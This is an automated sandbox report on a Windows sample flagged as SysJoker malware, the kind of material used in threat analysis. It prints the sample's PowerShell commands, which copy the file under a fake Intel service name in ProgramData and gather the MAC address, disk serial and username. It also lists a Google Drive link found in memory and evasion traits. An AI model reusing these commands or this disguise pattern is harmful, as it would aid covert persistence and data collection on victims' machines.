Windows Analysis Report qtjRj8L3Rw

Overview

General Information

Sample Name: qtjRj8L3Rw (renamed file extension from none to exe)
Analysis ID: 1708662
MD5: d90d0f4d6dad402b5d025987030cc87c
SHA1: fad66bdf5c5dc2c050cbc574832c6995dba086a0
SHA256: 1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c

Detection

SysJoker
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected SysJoker
Antivirus / Scanner detection for submitted sample
Found detection on Joe Sandbox Cloud Basic
Antivirus detection for dropped file
Writes or reads registry keys via WMI
Encrypted powershell cmdline option found
Powershell drops PE file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • qtjRj8L3Rw.exe (PID: 5732 cmdline: "C:\Users\user\Desktop\qtjRj8L3Rw.exe" MD5: D90D0F4D6DAD402B5D025987030CC87C)
    • powershell.exe (PID: 5848 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" copy 'C:\Users\user\Desktop\qtjRj8L3Rw.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • igfxCUIService.exe (PID: 4384 cmdline: "C:\ProgramData\SystemData\igfxCUIService.exe" MD5: D90D0F4D6DAD402B5D025987030CC87C)
      • powershell.exe (PID: 5312 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 4564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • getmac.exe (PID: 3328 cmdline: C:\Windows\system32\getmac.exe MD5: 6AB605BD2223BFB2E55A466BE9816914)
        • WMIC.exe (PID: 3788 cmdline: "C:\Windows\System32\Wbem\WMIC.exe" path win32_physicalmedia get SerialNumber MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • powershell.exe (PID: 4704 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $env:username | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\tempu.txt' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 4736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
qtjRj8L3Rw.exe | JoeSecurity_SysJoker | Yara detected SysJoker | Joe Security |

Dropped Files

Source | Rule | Description | Author | Strings
C:\ProgramData\SystemData\igfxCUIService.exe | JoeSecurity_SysJoker | Yara detected SysJoker | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000000.532048911.0000000000C1A000.00000002.00020000.sdmp | JoeSecurity_SysJoker | Yara detected SysJoker | Joe Security |
00000007.00000000.643724739.0000000000D5A000.00000002.00020000.sdmp | JoeSecurity_SysJoker | Yara detected SysJoker | Joe Security |
00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp | JoeSecurity_SysJoker | Yara detected SysJoker | Joe Security |
00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp | JoeSecurity_SysJoker | Yara detected SysJoker | Joe Security |
Process Memory Space: qtjRj8L3Rw.exe PID: 5732 | JoeSecurity_SysJoker | Yara detected SysJoker | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
7.0.igfxCUIService.exe.d10000.0.unpack | JoeSecurity_SysJoker | Yara detected SysJoker | Joe Security |
7.2.igfxCUIService.exe.d10000.0.unpack | JoeSecurity_SysJoker | Yara detected SysJoker | Joe Security |
0.2.qtjRj8L3Rw.exe.bd0000.0.unpack | JoeSecurity_SysJoker | Yara detected SysJoker | Joe Security |
0.0.qtjRj8L3Rw.exe.bd0000.0.unpack | JoeSecurity_SysJoker | Yara detected SysJoker | Joe Security |

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: qtjRj8L3Rw.exe | Avira: detected
Antivirus detection for dropped file
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Avira: detection malicious, Label: TR/Redcap.rjsiq
Source: qtjRj8L3Rw.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: qtjRj8L3Rw.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: 7_2_00D4B17F FindFirstFileExW, 7_2_00D4B17F
Source: powershell.exe, 00000003.00000003.610253378.0000000002A0D000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: igfxCUIService.exe, 00000007.00000002.825495321.0000000000B8A000.00000004.00000020.sdmp | String found in binary or memory: https://drive.google.com/uc?id=1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu
Source: igfxCUIService.exe, 00000007.00000002.825495321.0000000000B8A000.00000004.00000020.sdmp | String found in binary or memory: https://drive.google.com/uc?id=1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu2
Source: igfxCUIService.exe, 00000007.00000002.825495321.0000000000B8A000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

Found detection on Joe Sandbox Cloud Basic
Source: qtjRj8L3Rw | Joe Sandbox Cloud Basic: Detection: malicious Score: 92
Writes or reads registry keys via WMI
Source: C:\Windows\SysWOW64\getmac.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Powershell drops PE file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\ProgramData\SystemData\igfxCUIService.exe
Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | Code function: 0_2_00BD11F0 0_2_00BD11F0
Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | Code function: 0_2_00BD6820 0_2_00BD6820
Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | Code function: 0_2_00C00820 0_2_00C00820
Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | Code function: 0_2_00BFE852 0_2_00BFE852
Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | Code function: 0_2_00BFB99E 0_2_00BFB99E
Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | Code function: 0_2_00C10192 0_2_00C10192
Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | Code function: 0_2_00BD5230 0_2_00BD5230
Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | Code function: 0_2_00BD6630 0_2_00BD6630
Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | Code function: 0_2_00C13660 0_2_00C13660
Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | Code function: 0_2_00C13780 0_2_00C13780
Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | Code function: 0_2_00BFB76C 0_2_00BFB76C
Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | Code function: 0_2_00C11F1C 0_2_00C11F1C
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: 7_2_00D111F0 7_2_00D111F0
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: 7_2_00D50192 7_2_00D50192
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: 7_2_00D15230 7_2_00D15230
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: 7_2_00D53660 7_2_00D53660
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: 7_2_00D16630 7_2_00D16630
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: 7_2_00D53780 7_2_00D53780
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: 7_2_00D3B76C 7_2_00D3B76C
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: 7_2_00D508A9 7_2_00D508A9
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: 7_2_00D3E852 7_2_00D3E852
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: 7_2_00D16820 7_2_00D16820
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: 7_2_00D40820 7_2_00D40820
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: 7_2_00D3B99E 7_2_00D3B99E
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: 7_2_00D37960 7_2_00D37960
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: 7_2_00D4DDCF 7_2_00D4DDCF
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: 7_2_00D51F1C 7_2_00D51F1C
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: String function: 00D351F0 appears 53 times
Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | Code function: String function: 00BF51F0 appears 48 times
Source: qtjRj8L3Rw.exe, 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameIGFXCUISERVICE.EXE^ vs qtjRj8L3Rw.exe
Source: qtjRj8L3Rw.exe | Binary or memory string: OriginalFilenameIGFXCUISERVICE.EXE^ vs qtjRj8L3Rw.exe
Source: Joe Sandbox View | Dropped File: C:\ProgramData\SystemData\igfxCUIService.exe 1FFD6559D21470C40DCF9236DA51E5823D7AD58C93502279871C3FE7718C901C
Source: qtjRj8L3Rw.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\qtjRj8L3Rw.exe "C:\Users\user\Desktop\qtjRj8L3Rw.exe"
Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" copy 'C:\Users\user\Desktop\qtjRj8L3Rw.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | Process created: C:\ProgramData\SystemData\igfxCUIService.exe "C:\ProgramData\SystemData\igfxCUIService.exe"
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\getmac.exe C:\Windows\system32\getmac.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" path win32_physicalmedia get SerialNumber
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $env:username | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\tempu.txt'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Documents\20220112
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jmv4hq3u.jjj.ps1
Source: temps1.txt.8.dr | Binary string: 5C-22-C6-13-4E-F9 \Device\Tcpip_{B8652DFC-E1F5-449D-BAE4-BFF4128DE918}
Source: classification engine | Classification label: mal88.troj.evad.winEXE@16/11@0/0
Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | Code function: 0_2_00BDEC90 CoInitialize,CoCreateInstance, 0_2_00BDEC90
Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4736:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5868:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4564:120:WilError_01
Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | Code function: 0_2_00BD3FB0 LoadResource,LockResource,SizeofResource, 0_2_00BD3FB0
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: qtjRj8L3Rw.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: qtjRj8L3Rw.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: qtjRj8L3Rw.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: qtjRj8L3Rw.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: qtjRj8L3Rw.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: qtjRj8L3Rw.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: qtjRj8L3Rw.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: qtjRj8L3Rw.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: qtjRj8L3Rw.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: qtjRj8L3Rw.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: qtjRj8L3Rw.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | Code function: 0_2_00C15E0B push ecx; ret 0_2_00C15E1E
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: 7_2_00D35234 push ecx; ret 7_2_00D35246
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: 7_2_00D55E0B push ecx; ret 7_2_00D55E1E
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 7_2_00D360A8 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_00D360A8
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\SystemData\igfxCUIService.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion:

                        Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                        Source: C:\Windows\SysWOW64\getmac.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                        Source: C:\Windows\SysWOW64\getmac.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Windows\SysWOW64\getmac.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
                        Source: C:\Windows\SysWOW64\getmac.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe TID: 5736 | Thread sleep time: -30987s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5352 | Thread sleep time: -3689348814741908s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6072 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 4112 | Thread sleep time: -30792s >= -30000s
                        Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 4112 | Thread sleep time: -30908s >= -30000s
                        Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 4112 | Thread sleep time: -32018s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4520 | Thread sleep time: -20291418481080494s >= -30000s
                        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1065
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1857
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2595
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5118
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | API coverage: 8.8 %
                        Source: C:\ProgramData\SystemData\igfxCUIService.exe | API coverage: 8.5 %
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                        Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: 7_2_00D4B17F FindFirstFileExW
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | Thread delayed: delay time: 30987
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\ProgramData\SystemData\igfxCUIService.exe | Thread delayed: delay time: 30792
                        Source: C:\ProgramData\SystemData\igfxCUIService.exe | Thread delayed: delay time: 30908
                        Source: C:\ProgramData\SystemData\igfxCUIService.exe | Thread delayed: delay time: 32018
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | Code function: 0_2_00C01195 IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | Code function: 0_2_00BD40F0 GetProcessHeap, __Init_thread_footer, __Init_thread_footer
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | Code function: 0_2_00C02B5D mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | Code function: 0_2_00C0AF0E mov eax, dword ptr fs:[00000030h]
                        Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: 7_2_00D42B5D mov eax, dword ptr fs:[00000030h]
                        Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: 7_2_00D4AF0E mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | Code function: 0_2_00BF4DD5 IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exe | Code function: 0_2_00BF46CB SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
                        Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: 7_2_00D34F68 SetUnhandledExceptionFilter
                        Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: 7_2_00D41195 IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
                        Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: 7_2_00D346CB SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
